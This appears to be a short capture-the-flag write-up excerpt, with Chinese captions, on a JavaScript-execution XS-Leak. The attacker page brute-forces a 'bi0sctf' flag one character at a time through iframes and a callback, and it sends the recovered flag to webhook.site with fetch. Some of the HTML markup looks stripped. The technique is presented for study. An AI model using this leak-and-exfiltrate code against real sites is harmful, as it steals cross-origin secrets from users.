JavaScript Execution XS Leak
```javascript // Code that will try ${guess} as flag (need rest of the server code app.get('/guessing', function(req, res) { let guess = req.query.guess let page = ` function foo() { // If not the flag this will be executed window.parent.foo() }
hello2
` res.send(page) }); ``` 主页会生成 iframes 到之前的 `/guessing` 页面,以测试每种可能性。 ```html let candidateIsGood = false; let candidate = '' let flag = 'bi0sctf{' let guessIndex = -1 let flagChars = '_0123456789abcdefghijklmnopqrstuvwxyz}ABCDEFGHIJKLMNOPQRSTUVWXYZ'
// this will get called from our iframe IF the candidate is WRONG function foo() { candidateIsGood = false }
timerId = setInterval(() => { if (candidateIsGood) { flag = candidate guessIndex = -1 fetch('https://webhook.site/?flag='+flag) }
//Start with true and will be change to false if wrong candidateIsGood = true guessIndex++ if (guessIndex >= flagChars.length) { fetch('https://webhook.site/') return } let guess = flagChars[guessIndex] candidate = flag + guess let iframe = <iframe src="/guessing?guess=${encodeURIComponent(candidate)}"></iframe>
console.log('iframe: ', iframe) hack.innerHTML = iframe } , 500);
hello
```
最后更新于